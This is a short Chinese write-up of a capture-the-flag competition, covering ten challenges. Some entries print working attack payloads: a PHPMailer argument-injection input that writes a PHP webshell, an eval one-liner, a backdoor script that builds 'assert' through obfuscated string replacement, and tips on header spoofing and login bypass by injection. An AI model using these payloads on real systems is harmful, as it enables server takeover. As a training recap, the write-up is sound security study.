1,微信 User-Agent头伪造
User-Agent: Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365MicroMessenger/6.0 NetType/2GChrome/80.0.3987.149 Safari/537.36
2,PHPMailer远程命令执行漏洞
email填写:
代码语言:javascript复制"xxx". -OQueueDirectory=/tmp/. -X/var/www/html/xxxx.php @xxx.com
message填写:
代码语言:javascript复制<?php @eval($_GET[a]);?>
就会生成一个 xxxx.php,内容是 message填写的内容,访问即可getshell。
3,登录框SQL盲注
跑了半个多小时盲注。密码32位的还有两个。。。差点心态崩了。然后突然想起。。登录框注入。。。万能密码不就好了吗。。。
4,Supervisor远程命令执行漏洞(CVE-2017-11610)
https://blog.51cto.com/eth10/1955450 直接用exp秒
5,Referer来源伪造
burp把Referer改成他要的那个Referer就好了
6,一个很简单的代码审计,也称不上代码审计的审计
代码如下:
代码语言:javascript复制<?php
if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87') {
$_=@fopen('t.php', 'a');
@fwrite($_,"<?php $_=str_replace('ilo','ass',str_replace('vey','ert',$_GET[2]));
@$_($_POST[1]);?>");
@fclose($_);
}
?>
先带个 ?1=GET.fPZ87 访问之,然后就会生成一个t.php,访问t.php的时候get带上 ?2=ilovey 然后POST带上 1=php代码就好了。
7,PHPCMS v9.1.x的
只有一个前台,其他功能用不了。想登录二维码也没有,当时没时间就没做了
8,一个加解密啥的。是一个exe,吃了不会反编译的亏
无
9,wireshark分析数据包的。还挺简单。有技巧的查找
搜索php找到上传的马。然后看那个马干了啥就好了。
10,wireshark分析数据包的。也挺简单。有技巧的查找
找上传者的ip地址。一个技巧:把POST请求的数据包筛选出来。然后从第一个POST请求数据包开始提交IP地址。过滤PHP,POST,HTML
最终总结:
一开始做的时候会很慌,特别是我做SQL时间盲注的时候,一点点的出结果,等的人都傻了,还好后面想起可以万能密码登录,就是要随机应变吧,思路灵活点就好了。放松心态就好做很多。
鄙人不才,像我这种菜鸡。最终也是拿到了分数
相信各位师傅也是可以的,加油冲冲冲!!!